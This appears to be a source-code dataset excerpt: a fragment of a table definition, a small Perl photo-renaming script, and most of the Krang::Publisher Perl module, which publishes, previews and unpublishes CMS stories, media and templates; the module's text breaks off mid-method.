key(PK; DOCTYPE, DOCNUMBR, LNSEQNBR, DTLSEQNM)
{
Clustered = false;
}
}
fieldgroups
{
}
}
| 29.044776 | 308 | 0.538541 |
ed661e330d7676dc14af97d1a590752e2bbaac27 | 509 | pl | Perl | notes/photo_rename.pl | david-loffredo/pixtag | 3ad6814427b19729db0952b0cb81a7b395e95824 | [
"Apache-2.0"
] | null | null | null | notes/photo_rename.pl | david-loffredo/pixtag | 3ad6814427b19729db0952b0cb81a7b395e95824 | [
"Apache-2.0"
] | null | null | null | notes/photo_rename.pl | david-loffredo/pixtag | 3ad6814427b19729db0952b0cb81a7b395e95824 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/perl
# $RCSfile$
# $Revision$ $Date$
# Auth: Dave Loffredo (loffredo@steptools.com)
## $usage = "Usage: $0 <prefix> <number> <files>";
$usage = "Usage: $0 <oldprefix> <newprefix> <files>";
$count=0;
# Process the command line arguments
for (@ARGV) {
$file = $_;
$count++;
$newfile = sprintf "20030101_s%05d_dd.jpg", $count;
next unless -f $file;
next if $file eq $newfile;
#is it a regular file?
print "converting $file to $newfile\n";
rename $file, $newfile;
}
| 22.130435 | 55 | 0.616896 |
ed965543ec8050cc27aaff8668dfd4df73557209 | 86,488 | pm | Perl | lib/Krang/Publisher.pm | jmhutch/krang | fb96334f1be957ebbe63370ac50d989e28c3a8eb | [
"BSD-3-Clause"
] | 1 | 2018-02-15T03:54:35.000Z | 2018-02-15T03:54:35.000Z | lib/Krang/Publisher.pm | jmhutch/krang | fb96334f1be957ebbe63370ac50d989e28c3a8eb | [
"BSD-3-Clause"
] | 1 | 2018-07-24T21:38:29.000Z | 2018-07-24T22:36:36.000Z | lib/Krang/Publisher.pm | jmhutch/krang | fb96334f1be957ebbe63370ac50d989e28c3a8eb | [
"BSD-3-Clause"
] | 2 | 2018-07-24T21:48:08.000Z | 2020-05-25T18:18:05.000Z | package Krang::Publisher;
=head1 NAME
Krang::Publisher - Center of the Publishing Universe.
=head1 SYNOPSIS
use Krang::ClassLoader 'Publisher';
my $publisher = new pkg('Publisher')();
# Publish a list of stories to the preview path.
# returns preview URL of first story in the list.
my $url = $publisher->preview_story(story => \@stories);
# Publish a list of stories to the publish path.
$publisher->publish_story(story => \@stories);
# unpublish a story, usually called from $story->delete
$publisher->unpublish_story(story => $story);
# Publish a media object to the preview path.
# Returns the media URL if successful.
$url = $publisher->preview_media(media => $media);
# Publish a media object to the preview path.
# Returns the media URL if successful.
$url = $publisher->publish_media(media => $media);
# unpublish a media object, usually called from $media->delete
$publisher->unpublish_media(media => $media);
# Get the list of related stories and media that will get published
my $asset_list = $publisher->asset_list(story => [$story1, $story2]);
# Place a Krang::Template template into the production path, to be
# used when publishing.
$publisher->deploy_template(template => $template);
# Remove a template from the production path.
$publisher->undeploy_template(template => $template);
# Returns the mark used internally to break content into pages.
my $break_txt = $publisher->PAGE_BREAK();
# Return the Krang::Story object of the story currently being published.
my $story = $publisher->story();
# Return the Krang::Category object for the current category of the
# story being published.
my $category = $publisher->category();
# Return the filename for a given page of the story being published.
my $filename = $publisher->story_filename(page => $page_num);
# determine if we're in preview mode or publish mode.
$bool = $publisher->is_preview();
$bool = $publisher->is_publish();
# check to see if an object will be published, given its current state
$bool = $publisher->test_publish_status(object => $story, mode => 'publish');
=head1 DESCRIPTION
Krang::Publisher is responsible for coordinating the various
components that make up a Story (Elements, Media, Categories), and
putting them all together, out on the filesystem, for the world + dog
to see. The publish process will result in either 'preview' or
'publish' output - content-wise, they are indistinguishable.
In both the preview and publish process, stories are checked for
related media (see L<Krang::Story>->linked_media()). Media objects
will be copied into the proper output directory as part of the build
process.
Unless C<version_check> is turned off, all related assets will compare
C<version()> with C<preview_version()> or C<published_version()>, to see
if the currently live version (in either preview or publish, depending
on the mode) is the latest saved version. If so, the asset will not
be published, though it will be checked for additional related assets
to publish.
See L<Krang::ElementClass::TopLevel>->force_republish() to bypass the
C<version_check> functionality.
In the publish (but not preview) process, stories will also be checked
for linked stories (see L<Krang::Story>->linked_stories()). Any
linked-to stories will be checked for publish status, and will be
published if they are marked as unpublished.
=cut
use Krang::ClassFactory qw(pkg);
use strict;
use warnings;
use Carp;
use File::Spec::Functions;
use File::Copy qw(copy);
use File::Path;
use File::Temp qw(tempdir);
use Time::Piece;
use Krang::ClassLoader Conf => qw(KrangRoot instance PreviewSSL EnablePreviewEditor IgnorePreviewRelatedStoryAssets IgnorePreviewRelatedMediaAssets);
use Krang::ClassLoader 'Story';
use Krang::ClassLoader 'Category';
use Krang::ClassLoader 'Template';
use Krang::ClassLoader 'IO';
use Krang::ClassLoader History => qw(add_history);
use Krang::ClassLoader DB => qw(dbh);
use Krang::ClassLoader Element => qw(foreach_element);
use Krang::ClassLoader Log => qw(debug info critical);
use constant PUBLISHER_RO => qw(is_publish is_preview story category);
use constant PAGE_BREAK => "<<<<<<<<<<<<<<<<<< PAGE BREAK >>>>>>>>>>>>>>>>>>";
use constant CONTENT => "<<<<<<<<<<<<<<<<<< CONTENT >>>>>>>>>>>>>>>>>>";
use constant ADDITIONAL_CONTENT => "KRANG_ADDITIONAL_CONTENT";
use Exception::Class
'Krang::Publisher::FileWriteError' =>
{fields => ['story_id', 'media_id', 'template_id', 'source', 'destination', 'system_error']},
'Krang::Publisher::ZeroSizeOutput' => {fields => ['story_id', 'category_url', 'story_class']};
use Krang::ClassLoader MethodMaker => (
new_with_init => 'new',
new_hash_init => 'hash_init',
get => [PUBLISHER_RO]
);
=head1 INTERFACE
=head2 FIELDS
Access to fields for this object are provided by
Krang::MethodMaker. All fields are accessible in a B<read-only>
fashion. The value of fields can be obtained in the following
fashion:
$value = $publisher->field_name();
The available fields for a publish object are:
=over
=item * is_preview
Returns a 1 if the current publish run is in preview-mode, 0
otherwise.
=item * is_publish
Returns a 1 if the current publish run is in publish-mode (e.g. going
live), 0 otherwise.
=item * category
Returns a Krang::Category object for the category currently being
published.
=item * story
Returns a Krang::Story object for the Story currently being published.
=back
=cut
=head2 METHODS
=over
=item C<< $publisher = Krang::Publisher->new(); >>
Creates a new Krang::Publisher object. No parameters are needed at
this time.
=cut
#
# init()
#
# Sanity check as part of load.
#
sub init {
my $self = shift;
my %args = @_;
$self->hash_init(%args);
return;
}
=item C<< $url = $publisher->preview_story(story => $story) >>
Generates a story, saving it to the preview doc root on the
filesystem. Returns a URL to the story if successful, or will throw
one of several potential exceptions (e.g. filesystem problems, or errors
thrown by related objects) in the event something goes wrong.
Arguments:
=over
=item * C<story>
A single L<Krang::Story> object.
=item * C<unsaved>
defaults to 0. If C<unsaved> is true,
L<Krang::Story>->preview_version will be set to -1. What this does
is force a republish of the story object to the preview path the next
time the object comes up as a related object to a story being
previewed.
As part of the publish process, all media and stories linked to by
C<$story> will be examined. If the current version of each object has
not been published to preview, it will be. If the object has been
previewed previously, it will be skipped.
=item * C<version_check>
Defaults to 1. When true, it checks all related stories and media to
see if the current version has been published previously to the
preview path, skipping those that have. When false, it will publish
all related assets, regardless of whether or not the current version
has been published to preview before.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called when each object is published to the preview location. It
receives three named parameters:
=over
=item C<object>
The affected object.
=item C<counter>
The index of the current object in the list of objects being published.
=item C<total>
The total number of objects being published.
=back
=back
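For illustration, a typical preview call might look like this (the callback
body is only a sketch):
  my $url = $publisher->preview_story(
      story    => $story,
      callback => sub {
          my %arg = @_;    # object, counter, total
          print STDERR "previewed " . ref($arg{object}) . " ($arg{counter}/$arg{total})\n";
      },
  );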
=cut
sub preview_story {
my $self = shift;
my %args = @_;
# set internal mode - preview, not publish.
$self->_set_preview_mode();
# this is needed so that element templates don't get Krang's templates
local $ENV{HTML_TEMPLATE_ROOT} = "";
my $story = $args{story} || croak __PACKAGE__ . ": missing required argument 'story'";
my $callback = $args{callback};
my $unsaved = (exists($args{unsaved})) ? $args{unsaved} : 0;
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $keep_asset_list = $args{remember_asset_list} || 0;
# deploy any templates flagged as testing for this user
$self->_deploy_testing_templates();
my $publish_list = $self->asset_list(
story => [$story],
version_check => $version_check
);
$self->_process_preview_assets(
publish_list => $publish_list,
callback => $callback,
unsaved => $unsaved,
story => $story
);
# cleanup - remove any testing templates.
$self->_undeploy_testing_templates();
$self->_clear_asset_lists() unless ($keep_asset_list);
return $story->preview_url;
}
=item C<< $publisher->publish_story(story => $story, callback => \&onpublish) >>
Publishes a story to the live webserver document root, as set by
publish_path.
When a story is published, it is published under all categories it is
associated with (see Krang::Story->categories()).
As part of the publish process, all media and stories linked to by
$story will be examined. For each of these objects, if the latest
version has not yet been published, it will be. If the current
version has been published, it will be skipped (though the object's
links will also be checked).
If you do not care about related assets (WARNING - you want to care!),
you can set the argument C<< disable_related_assets => 1 >>.
If the user attempts to publish an object that is checked out by
someone else, it will get skipped.
It is assumed that the UI will prevent a user from attempting to
publish something when they do not have permissions. The only
access-control issues that will come up here would involve filesystem
permissions.
Arguments:
=over
=item * C<story>
Either a single L<Krang::Story> object, or a reference to an array of
L<Krang::Story> objects.
=item * C<disable_related_assets>
Defaults to 0. If true, no link-checking is done, only the items
passed in as part of the C<story> argument are published.
=item * C<version_check>
Defaults to 1. When true, it checks all related stories and media to
see if the current version has been published previously, skipping
those that have. When false, it will publish all related assets,
regardless of whether or not the current version has been published
before.
=item * C<maintain_versions>
Defaults to 0. If true, will re-publish the last-published
version of each asset rather than the latest version.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called as each object is published. It receives three named parameters:
=over
=item C<object>
The affected object.
=item C<counter>
The index of the current object in the list of objects being published.
=item C<total>
The total number of objects being published.
=back
=item * C<skip_callback>
The optional parameter C<skip_callback> is a pointer to a subroutine
which is called whenever an object is skipped during the publish
process, for whatever reason. It takes four named parameters:
=over
=item C<object>
The object being skipped during the publish run.
=item C<error>
The type of error. C<output_error>, C<checked_out>, and a number of
internal exceptions are the current set.
=item C<path>
The location on the filesystem where the object was to be published to.
=item C<error_msg>
A text message explaining the error in more detail.
=back
=back
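For illustration, a publish call wired up with both callbacks might look like
this (the handler bodies are only sketches):
  $publisher->publish_story(
      story         => \@stories,
      callback      => sub {
          my %arg = @_;    # object, counter, total
          print STDERR "published " . ref($arg{object}) . " ($arg{counter}/$arg{total})\n";
      },
      skip_callback => sub {
          my %arg = @_;    # object, error, path, error_msg
          print STDERR "skipped " . ref($arg{object}) . ": $arg{error}\n";
      },
  );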
=cut
sub publish_story {
my $self = shift;
my %args = @_;
# set internal mode - publish, not preview.
$self->_set_publish_mode();
my $story = $args{story} || croak __PACKAGE__ . ": missing required argument 'story'";
my $unsaved = (exists($args{unsaved})) ? $args{unsaved} : 0;
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $maintain_versions = (exists($args{maintain_versions})) ? $args{maintain_versions} : 0;
my %history_args;
if ( exists($args{scheduled_by}) ) {
$history_args{scheduled_by} = $args{scheduled_by};
$history_args{schedule_id} = $args{schedule_id};
}
my $implication_map = { map {$self->_implication_key($_) => 'original publish list'} (ref $story eq 'ARRAY') ? @$story : ($story) };
# callbacks
my $callback = $args{callback};
my $skip_callback = $args{skip_callback};
my $no_related_check =
(exists($args{disable_related_assets})) ? $args{disable_related_assets} : 0;
my $keep_asset_list = $args{remember_asset_list} || 0;
my $user_id = $ENV{REMOTE_USER};
my $publish_list;
# this is needed so that element templates don't get Krang's templates
local $ENV{HTML_TEMPLATE_ROOT} = "";
# build the list of assets to publish.
if ($no_related_check) {
debug(__PACKAGE__ . ": disabling related_assets checking for publish");
if (ref $story eq 'ARRAY') {
$publish_list = $story;
} else {
push @$publish_list, $story;
}
# normally _build_asset_list() handles the 'maintain_version' option, so
# when running in 'disable_related_assets' mode we need to handle it here
if ($maintain_versions) {
my @stories;
foreach my $s (@$publish_list) {
if ($s->checked_out && ($s->checked_out_by != $user_id)) {
# if story is checked out to another user, it shouldn't get published anyway
# (doing so would clear the checked-out flag), so we don't get old version
push @stories, $s;
} else {
# story is not checked out, so we grab last-published version (if any)
my $v = $s->published_version;
next unless $v;
if ($v == $s->version) {
push @stories, $s;
} else {
push @stories, pkg('Story')->find(story_id => $s->story_id, version => $v);
}
}
}
$publish_list = \@stories;
}
} else {
$publish_list = $self->asset_list(
story => $story,
implication_map => $implication_map,
version_check => $version_check,
maintain_versions => $maintain_versions
);
}
$self->_process_assets(
publish_list => $publish_list,
implication_map => $implication_map,
skip_callback => $skip_callback,
callback => $callback,
user_id => $user_id,
remember_asset_list => $keep_asset_list,
history_args => \%history_args
) if scalar(@$publish_list);
$self->_clear_asset_lists() unless ($keep_asset_list);
}
=item C<< $publisher->unpublish_story(story => $story) >>
Removes a story from its published locations. Usually called by
$story->delete. Affects both preview and publish locations.
The C<published>, C<publish_date> and C<published_version>
attributes of the L<Krang::Story> object are all reset to C<undef>.
=cut
sub unpublish_story {
my ($self, %arg) = @_;
my $dbh = dbh;
my $story = $arg{story} || croak __PACKAGE__ . ": missing required argument 'story'";
# get location list, preview and publish
my $paths =
$dbh->selectcol_arrayref("SELECT path FROM publish_story_location WHERE story_id = ?",
undef, $story->story_id);
# neither published nor previewed?
return unless @$paths;
# delete story in publish and/or preview dir(s)
foreach my $path (@$paths) {
next unless -f $path;
# make sure this path isn't claimed by another story
my ($claimed_by_story_id) =
$dbh->selectrow_array(
"SELECT story_id FROM publish_story_location WHERE path = ? AND story_id != ?",
undef, $path, $story->story_id);
if ($claimed_by_story_id) {
next unless $self->_is_path_claim_stale(
type => 'story',
claimed_id => $claimed_by_story_id,
claimed_path => $path,
);
debug(__PACKAGE__ . ": clearing stale publish_story_location entry for path=" . $path . " by story id=" . $claimed_by_story_id);
# clean the stale claim
$dbh->do('DELETE FROM publish_story_location WHERE story_id = ? AND path = ?', undef, $claimed_by_story_id, $path);
}
unlink($path)
or croak("Unable to delete file '$path' during unpublish : $!");
}
# delete the dir itself - if it's empty
my @cats = $story->categories();
foreach my $cat (@cats) {
# only if the story isn't a "Cover"
next if ($cat->url eq $story->url);
my %path_args = (category => $cat);
for my $dir ($story->preview_path(%path_args), $story->publish_path(%path_args)) {
next unless -d $dir;
opendir(DIRH, $dir)
or croak("Unable to open directory $dir during unpublish: $!");
my @files = grep { not /^\.\.?$/ } readdir(DIRH);
closedir(DIRH);
next if @files;
rmdir($dir)
or croak("Unable to delete dir '$dir' during unpublish : $!");
}
}
# clean the table
$dbh->do('DELETE FROM publish_story_location WHERE story_id = ?', undef, $story->story_id);
# unset the publish flags
$story->{published_version} = undef;
$story->{publish_date} = undef;
$dbh->do(
'UPDATE story SET published_version = ?, publish_date = ? WHERE story_id = ?',
undef,
$story->{published_version},
$story->{publish_date},
$story->{story_id}
);
}
=item C<< $publisher->unpublish_media(media => $media) >>
Removes a media object from its published locations. Usually called
by $media->delete. Affects both preview and publish locations.
The C<published>, C<publish_date> and C<published_version>
attributes of the L<Krang::Media> object are reset to C<undef>.
=cut
sub unpublish_media {
my ($self, %arg) = @_;
my $dbh = dbh;
my $media = $arg{media} || croak __PACKAGE__ . ": missing required argument 'media'";
# get location list, preview and publish
my $paths =
$dbh->selectcol_arrayref("SELECT path FROM publish_media_location WHERE media_id = ?",
undef, $media->media_id);
# delete
foreach my $path (@$paths) {
next unless -f $path;
unlink($path)
or croak("Unable to delete file '$path' during unpublish : $!");
}
# clean the table
$dbh->do('DELETE FROM publish_media_location WHERE media_id = ?', undef, $media->media_id)
if @$paths;
# unset the publish flags
$media->{published_version} = undef;
$media->{publish_date} = undef;
$media->{published} = 0;
# update the DB.
$dbh->do(
'UPDATE media
SET published_version = ?,
publish_date = ?,
published = 0
WHERE media_id = ?',
undef,
$media->{published_version},
$media->{publish_date},
$media->{media_id}
);
# if media element has an unpublish() method, call it
if ($media->element->class->can('unpublish')) {
$media->element->class->unpublish(
publisher => $self,
media => $media,
element => $media->element
);
}
}
=item C<< $url = $publisher->preview_media(media => $media, unsaved => 1) >>
Copies a media file out to the webserver doc root for the preview
website.
Arguments:
=over
=item * C<media>
Required. The L<Krang::Media> object being previewed.
=item * C<unsaved>
Optional, defaults to 0. If C<unsaved> is true,
C<< Krang::Media->preview_version >> will be set to -1. What this does
is force a republish of the media object to the preview path the next
time the object comes up as a related object to a story being
previewed.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=back
Returns a url to the media file on the preview website if successful.
Will throw an exception if there are problems with the copy.
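For example, previewing a media object that is still being edited (and so
should be re-previewed the next time it comes up as a related asset) might
look like:
  my $url = $publisher->preview_media(
      media   => $media,
      unsaved => 1,
  );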
=cut
sub preview_media {
my $self = shift;
my %args = @_;
$self->_set_preview_mode();
my $keep_asset_list = $args{remember_asset_list} || 0;
my $media = $args{media} || croak __PACKAGE__ . ": Missing argument 'media'!\n";
my $unsaved = (exists($args{unsaved})) ? $args{unsaved} : 0;
# add it to the asset list
unless ($unsaved) {
$self->_mark_asset(object => $media);
}
$media->mark_as_previewed(unsaved => $unsaved);
$self->_clear_asset_lists() unless ($keep_asset_list);
return $self->_write_media(media => $media);
}
=item C<< $url = $publisher->publish_media(media => $media) >>
Copies a media file out to the webserver doc root for the publish website.
Arguments:
=over
=item * C<media>
Required. The Krang::Media object being published.
=item * C<remember_asset_list>
Boolean, defaults to false.
If true, the C<Krang::Publisher> object will remember these media
objects, and will skip re-publishing them if they come up again
(e.g. if linked to a story being published).
This only affects successive publish calls to a single
C<Krang::Publisher> object. See C<bin/krang_publish> for an example
of this functionality being used.
=item * C<maintain_versions>
Defaults to 0. If true, we will re-publish the last-published
version of the media (if any) rather than the latest.
=back
Returns a url to the media file on the publish website if successful.
If the user attempts to publish content that is checked out by someone
else, it will get skipped.
It is assumed that the UI will prevent a user from attempting to
publish something when they do not have permissions.
Will throw an exception if there are problems with the copy.
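A sketch of publishing several media objects at once - publish_media() also
accepts an array ref and returns the list of published URLs:
  my @urls = $publisher->publish_media(media => \@media_objects);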
=cut
sub publish_media {
my $self = shift;
my %args = @_;
$self->_set_publish_mode();
# callbacks
my $callback = $args{callback};
my $skip_callback = $args{skip_callback};
my $maintain_versions = $args{maintain_versions} || 0;
my $keep_asset_list = $args{remember_asset_list} || 0;
croak(__PACKAGE__ . ": Missing argument 'media'!\n") unless (exists($args{media}));
my %history_args;
if ( exists($args{scheduled_by}) ) {
$history_args{scheduled_by} = $args{scheduled_by};
}
my $implication_map = { map {$self->_implication_key($_) => 'original publish list'} (ref $args{media} eq 'ARRAY') ? @{$args{media}} : ($args{media}) };
my $publish_list;
if (ref $args{media} eq 'ARRAY') {
$publish_list = $args{media};
} else {
push @$publish_list, $args{media};
}
$publish_list = $self->_add_category_linked_stories($publish_list, $implication_map) unless $ENV{KRANG_TEST};
my @urls = $self->_process_assets(
publish_list => $publish_list,
implication_map => $implication_map,
skip_callback => $skip_callback,
callback => $callback,
user_id => $ENV{REMOTE_USER},
remember_asset_list => $keep_asset_list,
history_args => \%history_args
) if scalar(@$publish_list);
$self->_clear_asset_lists() unless ($keep_asset_list);
return @urls;
}
=item C<< $asset_list = $publisher->asset_list(story => $story) >>
Returns the list of stories and media objects that will get published
if either L<publish_story()> or L<preview_story()> is called.
The sub calls $story->linked_stories() and $story->linked_media() to
generate the lists, recursively operating on the results generated by
$story->linked_stories().
If successful, it will return lists of L<Krang::Story> and
L<Krang::Media> objects that will get published along with $story. At
the absolute minimum (no linked stories or media), $stories->[0] will
contain the originally submitted parameter $story.
Arguments:
=over
=item * C<story>
The story parameter can either be a single L<Krang::Story> object or a
list of L<Krang::Story> objects.
=item * C<keep_asset_list>
Defaults to false. If true, the internal list of checked stories is
not cleared upon completion. If you are going to be making multiple
successive calls to asset_list(), and want to ensure that the
returning asset list does not contain assets from previous calls, set
to true.
=item * C<mode>
Optional. Either 'preview' or 'publish'. If not set, checks to see
if either C<is_preview()> or C<is_publish> is true. If neither are
true, will croak.
=item * C<version_check>
Defaults to true. If true, every related asset will be checked to see
if either C<< $object->preview_version() >> or
C<< $object->published_version() >> (depending on C<mode> above) is equal
to C<< $object->version() >>. If so, it won't be published, but its
related assets will still be checked.
Setting C<version_check> to 0 (false) will result in the original
Krang behavior - all related content will be published, regardless of
versioning.
This addition is a performance improvement - the purpose is to keep
from publishing content that has not changed since the last
publishing.
=item * C<maintain_versions>
Defaults to 0. If true (and in publish mode), we will build a list of the
last-published version of each asset (if any) rather than the latest version.
=back
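For illustration, the returned list can be inspected before deciding to
publish (Krang story and media objects both provide a url() method):
  my $asset_list = $publisher->asset_list(
      story => [$story],
      mode  => 'publish',
  );
  foreach my $object (@$asset_list) {
      print STDERR ref($object) . ": " . $object->url . "\n";
  }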
=cut
sub asset_list {
my $self = shift;
my %args = @_;
my $story = $args{story} || croak __PACKAGE__ . ": Missing parameter 'story'";
my $mode = $args{mode};
my $implication_map = $args{implication_map};
# my $keep_list = $args{keep_asset_list} || 0;
# my $keep_list = 0;
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
# check publish mode.
if ($mode) {
if ($mode eq 'preview') { $self->_set_preview_mode(); }
elsif ($mode eq 'publish') { $self->_set_publish_mode(); }
else { croak __PACKAGE__ . ": unknown output mode '$mode'\n"; }
} else {
if ($self->is_preview()) { $mode = 'preview'; }
elsif ($self->is_publish()) { $mode = 'publish'; }
else {
croak "Publish mode unknown. Set the 'mode' argument'";
}
}
my $maintain_versions = (($mode eq 'publish') && $args{maintain_versions}) ? 1 : 0;
my @publish_list = $self->_build_asset_list(
object => $story,
implication_map => $implication_map,
version_check => $version_check,
maintain_versions => $maintain_versions,
initial_assets => 1
);
my $publish_list = \@publish_list;
$publish_list = $self->_add_category_linked_stories($publish_list, $implication_map)
if $mode eq 'publish' and not $ENV{KRANG_TEST};
# unless ($keep_list) {
# $self->_clear_asset_lists();
# }
return $publish_list;
}
=item C<< $publisher->_process_assets(%args) >>
Called by publish_story(). The method takes a list of assets to publish via
C<publish_list>, then writes each asset out to disk.
Arguments:
=over
=item * C<publish_list>
Array reference of assets to publish.
=item * C<skip_callback>
The optional parameter C<skip_callback> is a pointer to a subroutine
which is called whenever an object is skipped during the publish
process, for whatever reason. It takes four named parameters:
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called as each object is published. It receives three named parameters:
=item * C<remember_asset_list>
Boolean; if true, the internal asset lists are not cleared via _clear_asset_lists() on completion.
=item * C<user_id>
Needed to make sure the object to be published isn't checked out by another user.
=back
=cut
sub _process_assets {
my ($self, %args) = @_;
my $total = @{$args{publish_list}};
my $counter = 0;
my $user_id = $ENV{REMOTE_USER};
my $callback = $args{callback};
my $skip_callback = $args{skip_callback};
my $maintain_versions = $args{maintain_versions} || 0;
my @media_urls;
foreach my $object (@{$args{publish_list}}) {
$args{history_args}{origin} = $self->_stringify_implication_chain($args{implication_map}, $object);
if ($object->isa('Krang::Story')) {
if ($object->checked_out) {
if ($user_id != $object->checked_out_by) {
debug(__PACKAGE__ . ": skipping checked out story id=" . $object->story_id);
$skip_callback->(object => $object, error => 'checked_out')
if $skip_callback;
next;
}
}
eval {
my @paths = $self->_build_story_all_categories(
story => $object,
history_args => $args{history_args},
);
# fix up publish locations
$self->_rectify_publish_locations(
object => $object,
paths => \@paths,
preview => 0
);
# mark as published.
$object->mark_as_published();
# don't make callbacks on media, that's handled in publish_media().
$callback->(
object => $object,
total => $total,
counter => $counter++
) if $callback;
};
if (my $err = $@) {
if ($skip_callback) {
# call skip_callback, hopefully with a real error
# object
$skip_callback->(object => $object, error => $err);
} else {
# the skip_callback is not used by the CGIs,
                    # re-propagate the error so the UI can handle it.
die($err);
}
}
# clear the publish context to not dirty things for the
# next pass.
$self->clear_publish_context();
} elsif ($object->isa('Krang::Media')) {
# cannot publish assets checked out by other users.
if ($object->checked_out) {
if ($user_id != $object->checked_out_by) {
debug( __PACKAGE__
. ": skipping publish on checked out media object id="
. $object->media_id);
$skip_callback->(object => $object, error => 'checked_out') if $skip_callback;
next;
}
}
# if requested, re-publish last-published (instead of latest) version
if ($maintain_versions) {
my $v = $object->published_version;
next unless $v;
if ($v != $object->version) {
                    # assign to the existing loop variable (no 'my') so the older
                    # version is what actually gets published
                    ($object) =
                      pkg('Media')->find(media_id => $object->media_id, version => $v);
}
}
eval {
push @media_urls, $self->_write_media(media => $object);
# log event
my %history_args = $args{history_args} ? %{$args{history_args}} : ();
add_history(object => $object, action => 'publish', %history_args);
$object->mark_as_published();
$callback->(
object => $object,
total => $total,
counter => $counter++
) if $callback;
};
if ($@) {
if ($skip_callback) {
if (ref $@ && $@->isa('Krang::Publisher::FileWriteError')) {
$skip_callback->(
object => $object,
error => 'output_error',
path => $@->destination,
error_msg => $@->system_error
);
} else {
# call generic skip_callback.
$skip_callback->(object => $object, error => ref $@ ? $@->isa : $@);
}
}
                # the skip_callback is not used by the CGIs - re-propagate the error so the UI
# can handle it.
else {
die($@);
}
}
}
}
return @media_urls;
}
=item C<< $publisher->_process_preview_assets(%args) >>
Called by preview_story(). The method takes a list of assets to publish via
C<publish_list>, then writes them out to the preview path. Decoupling the
asset list from the actual writing of assets permits a more natural entry
point for a subclass (to be written at a later time) to provide parallel
publishing behavior.
Arguments:
=over
=item * C<publish_list>
array reference of assets to publish to the preview location.
=item * C<callback>
The optional parameter C<callback> will point to a subroutine which is
called when each object is published to the preview location. It
receives three named parameters:
=item * C<story>
Initial story object to preview.
=item * C<unsaved>
defaults to 0. If C<unsaved> is true,
L<Krang::Story>->preview_version will be set to -1. What this does
is force a republish of the story object to the preview path the next
time the object comes up as a related object to a story being
previewed.
As part of the publish process, all media and stories linked to by
C<$story> will be examined. If the current version of each object has
not been published to preview, it will be. If the object has been
previewed previously, it will be skipped.
=back
=cut
sub _process_preview_assets {
my ($self, %args) = @_;
my $total = @{$args{publish_list}};
my $counter = 0;
foreach my $object (@{$args{publish_list}}) {
if ($object->isa('Krang::Story')) {
my @paths = $self->_build_story_all_categories(story => $object);
# fix up publish locations
$self->_rectify_publish_locations(
object => $object,
paths => \@paths,
preview => 1
);
# make a note on preview status. Initial story may be in
# edit mode, the rest are not.
if ($object->story_id == $args{story}->story_id) {
$object->mark_as_previewed(unsaved => $args{unsaved});
} else {
$object->mark_as_previewed(unsaved => 0);
}
# clear context to not sully the next story.
$self->clear_publish_context;
} elsif ($object->isa('Krang::Media')) {
debug('Publisher.pm: Previewing media_id=' . $object->media_id());
$self->preview_media(media => $object);
}
$args{callback}->(
object => $object,
total => $total,
counter => $counter++
) if $args{callback};
}
}
=item C<< $filename = $publisher->deploy_template(template => $template); >>
Deploys the template stored in a L<Krang::Template> object into the template publish_path under $KRANG_ROOT.
The final path of the template is based on $category->url() and $template->element_class_name().
If successful, deploy_template() returns the final resting place of the template. In the event of an error, deploy_template() will croak.
deploy_template() makes no attempt to update the database as to the publish status or location of the template - that is the responsibility of Krang::Template (or should it call the appropriate method in Krang::Template?)
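A minimal example, given a L<Krang::Template> object:
  my $path = $publisher->deploy_template(template => $template);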
=cut
sub deploy_template {
my $self = shift;
my %args = @_;
my $template = $args{template} || croak __PACKAGE__ . ": Missing argument 'template'!\n";
# write the template out.
my $filename = $self->_write_template(template => $template);
# mark template as deployed.
$template->mark_as_deployed();
# log event.
add_history(object => $template, action => 'deploy');
return $filename;
}
=item C<< $publisher->undeploy_template(template => $template); >>
Removes the template specified by a L<Krang::Template> object from the template publish_path under $KRANG_ROOT.
The location of the template is based on $category->url() and $template->element_class_name().
If successful, undeploy_template() returns nothing. In the event of an error, undeploy_template() will croak.
undeploy_template() makes no attempt to update the database as to the publish status or location of the template - that is the responsibility of Krang::Template (or should it call the appropriate method in Krang::Template?)
=cut
sub undeploy_template {
my $self = shift;
my %args = @_;
my $template = $args{template} || croak __PACKAGE__ . ": Missing argument 'template'!\n";
my $category = $template->category();
my @tmpl_paths = $self->template_search_path(category => $category);
my $path = $tmpl_paths[0];
my $file = catfile($path, $template->filename());
if (-e $file) {
if (-d $file) {
croak __PACKAGE__ . ": template file '$file' is a directory - will not delete.\n";
}
unlink $file;
}
# mark template as undeployed.
$template->mark_as_undeployed();
# log event.
add_history(object => $template, action => 'undeploy');
return;
}
=item C<< $dir = $publisher->template_search_path(category => $category) >>
Given the current category, returns the list of directories that may
contain a template. The first element in the returning array contains
the directory of the current category, the last element contains the
directory of the root category (parent of all categories in the site).
Arguments:
=over
=item * C<category>
An optional argument - if not supplied, the current L<Krang::Category>
category in the publish run is used (usually the best choice).
=back
A note on preview: In preview mode, this method will check to see if
the user has a testing-template temporary directory (created if the
user has templates checked out & flagged for testing). If so, the
testing-template temporary directory paths will be interspersed with
the deployed-template dirs (in the order of TEST/PROD/TEST/PROD).
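For illustration, the returned list can be walked most-specific-first to find
a particular template file ('page.tmpl' is just a stand-in name; catfile() is
from File::Spec::Functions):
  my $found;
  foreach my $dir ($publisher->template_search_path(category => $category)) {
      my $file = catfile($dir, 'page.tmpl');
      if (-e $file) {
          $found = $file;
          last;
      }
  }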
=cut
sub template_search_path {
my $self = shift;
my %args = @_;
my @subdirs = ();
my @paths = ();
my $category;
my $preview_root;
